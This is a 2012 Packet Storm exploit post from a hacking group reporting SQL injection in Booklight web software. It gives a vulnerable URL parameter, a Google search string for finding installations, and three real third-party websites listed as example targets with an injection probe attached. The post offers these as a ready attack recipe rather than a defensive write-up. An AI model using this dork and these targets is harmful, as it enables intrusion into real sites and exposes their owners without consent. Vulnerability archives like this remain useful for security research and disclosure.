Booklight SQL Injection

2012-04-30T00:00:00
ID PACKETSTORM:112315
Type packetstorm
Reporter BHG Security Center
Modified 2012-04-30T00:00:00

Description

                                        
                                            `################################################################################################  
# Exploit Title: Booklight SQL Injection Vulnerabilities  
# Google Dork: "by Booklight Inc"  
# Date: 2012/04/29  
# Category : [Web Application]  
# Author: #BHG Security Center  
# Discovered by : Nitrojen90  
# WebSite : black-hg.org  
# Software Link: http://booklightinc.com/  
# Version: Last Version  
# Security Risk::High  
# Tested on: GNU/Linux - Windows  
################################################################################################  
# p0c :  
#  
# http://target.com/b.php?id=[SQL]  
#  
# Example :  
# http://www.monasticdialog.com/b.php?id=96'  
# http://www.schoolforwellbeing.org/b.php?id=1'  
# http://www.mukeshmarwah.net/b.php?id=1'  
################################################################################################  
# Special Thanks To : Net.Edit0r - A.Cr0x - 3H34N - Mr.XHat - G3n3rall -  
Nol1m1t - Dj.TiniVini  
################################################################################################  
# GreetZ : Mikili - 2MzRp - 0x0ptim0us - farbodmahini - Crim3R  
################################################################################################  
`